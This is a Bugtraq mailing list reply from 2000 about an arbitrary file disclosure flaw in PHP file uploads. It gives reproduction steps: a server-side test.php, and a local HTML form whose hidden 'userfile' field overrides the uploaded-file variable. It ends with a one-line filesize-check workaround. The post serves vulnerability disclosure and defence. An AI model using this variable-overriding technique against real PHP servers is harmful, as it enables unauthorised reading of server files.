Bugtraq mailing list archives
Re: (SRADV00001) Arbitrary file disclosure through PHP file upload
From: Signal 11 <signal11 () MEDIAONE NET>
Date: Mon, 4 Sep 2000 01:39:14 -0500
I have forwarded the original message to php-dev () lists php net, as there was no indication the developers were copied on the bugtraq post. This issue is Bug ID #6496 in the PHP bug database. Additional information is here: http://bugs.php.net/bugs.php?id=6496, and was entered 09/01/2000. However, the problem was discovered as early as May 15 by hgerlach () gmx de Original post: http://www.php.net/manual/features.file-upload.php (about 2/3rds of the way down in the user comments) Also, my copy of PHP has track_vars enabled per default (as per the php4 that ships with Mandrake 7), which was one of the recommendations you made in your original post. Here's how you can reproduce this on your own. Create the following file as "test.php" on the http server running php: <!-- test.php ##################################################### --> <html> <body> <form action="<?php echo $PHP_SELF ?>" method="POST" ENCTYPE="multipart/form-data"> <input type="file" name="userfile"> <input type="submit"> </form> <pre> <?php echo("userfile =$userfile \n"); echo("userfile_name = $userfile_name \n"); echo("userfile_type = $userfile_type \n"); echo("userfile_size = $userfile_size \n"); ?> </pre> </body> </html> <! -- CUT HERE #################################################### --> Now, create a file on your LOCAL computer called test.html with the following contents: <!-- test.html ##################################################### --> <html> <body> <form action="http://YOUR_SERVER_HERE/blah/blah/test.php" ENCTYPE="multipart/form-data" method="POST"> <input type="file" name="userfile"> <input type="hidden" name="userfile" value="hackme"> <input type="submit"> </form> </body> </html> <! -- CUT HERE #################################################### --> Goto http://YOUR_SERVER_HERE/blah/blah/test.php and run the script, upload any file. Note the output. Now open test.html on your LOCAL computer and repeat the same steps you did when you were on the server. Hit submit. Note the change in output. Now, before you go off the deep end there is a simple one-line workaround... <?php if($userfile_size != filesize($userfile)){ echo "File upload variables have been tampered with.\n"; } ?> This will prevent most attacks, unless the filesize is the same as the local file. Like I said - workaround.. but it is one you can impliment in your code *now* instead of waiting for a patch. I'm hoping the PHP guys will update the bug 6496 with either a fix or an assignment soon... -- Signal 11 -o- BOFH, boredengineers.com Q: What's the difference between your project and putting wings on an elephant? A: The elephant *might* fly.
Current thread:
- (SRADV00001) Arbitrary file disclosure through PHP file upload Secure Reality Advisories (Sep 03)
- Re: (SRADV00001) Arbitrary file disclosure through PHP file upload Signal 11 (Sep 04)
- Re: [PHP-DEV] RE: (SRADV00001) Arbitrary file disclosure through PHP file upload Rasmus Lerdorf (Sep 04)
- Re: [PHP-DEV] RE: (SRADV00001) Arbitrary file disclosure through PHP file upload Zeev Suraski (Sep 04)
- Message not available
- Re: [PHP-DEV] RE: (SRADV00001) Arbitrary file disclosure throughPHP file upload Zeev Suraski (Sep 04)
- Re: [PHP-DEV] RE: (SRADV00001) Arbitrary file disclosure through PHP file upload Rasmus Lerdorf (Sep 04)
- Re: (SRADV00001) Arbitrary file disclosure through PHP file upload Signal 11 (Sep 04)